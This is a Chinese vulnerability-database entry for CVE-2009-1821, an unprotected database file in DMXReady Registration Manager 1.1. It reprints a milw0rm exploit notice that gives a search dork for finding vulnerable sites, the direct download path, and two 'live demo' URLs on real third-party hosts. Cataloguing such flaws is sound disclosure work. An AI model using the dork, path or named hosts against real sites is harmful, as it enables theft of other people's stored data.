DMXReady Registration Manager 'databases/webblogmanager.mdb'权限许可和访问控制漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117778 漏洞类型 权限许可和访问控制
发布时间 2009-05-15 更新时间 2009-05-29
CVE编号 CVE-2009-1821 CNNVD-ID CNNVD-200905-340
漏洞平台 ASP CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/8705
https://www.securityfocus.com/bid/79476
https://cxsecurity.com/issue/WLB-2009060076
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200905-340
|漏洞详情
DMXReadyRegistrationManager1.1版本在网根中储存敏感信息,但没有赋予足够的访问限制,远程攻击者可以借助对databases/webblogmanager.mdb的一个直接请求,下载数据库文件。
|漏洞EXP
************************************************** *****************************
# Title : DMXReady Registration Manager 1.1 Remote Database Disclosure Vulnerability
# Author : S4S-T3rr0r!sT
# Contact : l3t@hotmail.com / S4S@n2m3.com
# S.Page : DMXReady CMS Plugin Applications Web Site Design Extensions Dreamweaver ASP Template Database Driven
# Site : WwW.s3curi7y.com / www.h-t.cc
************************************************** *****************************

D0rk : "inurl:inc_webblogmanager.asp"

Exploit :

# http://[target].com/[path]/databases/webblogmanager.mdb

l!ve D3mo :

# http://74.200.213.93/databases/webblogmanager.mdb
# http://www.nomorewar.com/databases/webblogmanager.mdb


V1V4 GaZa

./Done

Thanx To : Cold-Z3ro , HcJ , ViRuSMaN , AlQaYsAr , zAx , Cyb3r-Err0r ,Arabic S3curi7y crew Members, all arabian hacker

# milw0rm.com [2009-05-15]
|受影响的产品
DMXReady Registration Manager 1.1
|参考资料

来源:XF
名称:registrationmgr-webblogmgr-info-disclosure(50915)
链接:http://xforce.iss.net/xforce/xfdb/50915
来源:VUPEN
名称:ADV-2009-1347
链接:http://www.vupen.com/english/advisories/2009/1347
来源:MILW0RM
名称:8705
链接:http://www.milw0rm.com/exploits/8705